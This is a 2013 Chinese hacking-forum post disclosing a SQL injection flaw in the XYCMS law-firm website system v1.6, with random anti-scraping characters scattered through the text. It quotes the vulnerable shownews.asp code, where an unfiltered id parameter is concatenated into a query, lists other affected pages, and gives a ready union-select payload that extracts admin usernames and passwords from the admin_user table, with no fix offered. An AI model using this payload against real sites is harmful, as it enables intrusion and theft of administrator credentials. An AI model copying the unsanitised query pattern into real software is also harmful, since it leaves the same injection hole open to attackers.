找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2158|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' F% h5 g) V; }+ D
" S: z1 M3 ~- W! _
淫荡分割线
7 o/ f) r5 o2 G9 g/ P9 E--------------------------------------------------------. j0 z3 @; Y$ B1 F7 \, Z

9 _" ?( n) D: x$ W. a) ?8 i审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)- h- P( v# c) S+ |/ q
源码地址:http://down.chinaz.com/soft/29233.htm
- H# b! W( R+ f8 y* b' u / G9 X+ V0 y- `* V" e2 `! F5 y8 F
漏洞文件:shownews.asp* N9 F9 O) i& q5 `/ X+ n
漏洞代码:7-13行
$ Z6 }: ]( x$ x) {- I0 d# O & z' E& S4 E7 r$ D  Z( `

7 ?- L1 e9 x" t! A<%
9 c8 p& f! t7 g. ?& Q- Z, }id=request.QueryString("id")5 q+ f; E% X2 }3 T3 r: t
    7 {0 g1 y: b) c- l9 D4 R1 B  z* h
set snews=server.createobject("adodb.recordset")
+ O$ D% {. G- }4 P+ s' u* }exec="select * from [news] where id="&id; X5 n. }+ }4 H0 q+ x
snews.open exec,conn,1,1- h+ ]# S+ A) V& h, C% B# v, X
%>
% d1 C8 m1 T( b1 j; `5 K
  k* E9 V: K. l  W, Y" T   H. b8 a/ T, H( G5 p3 h& h
什么过滤都没有  直造成注入' V0 S& C. u& Z  Z) l5 r6 v9 s
" [1 \% Q( Q$ f( q
注入点:http://127.0.0.1:99/shownews.asp?id=xx
! }1 H4 {1 m5 c# k) ^4 |   K) a6 O3 a$ i* W" r
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找9 z" i4 t- M' n7 Y. e/ p- a) ^( h

: J$ Q' Q7 f! w! t5 p % u5 ?0 n- T- ~- W+ S" C
exp: union select 1,admin,password,4,5,7 from admin_user
7 x8 F( `7 A5 q  \( d
- k5 e- h, \8 G4 |- R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表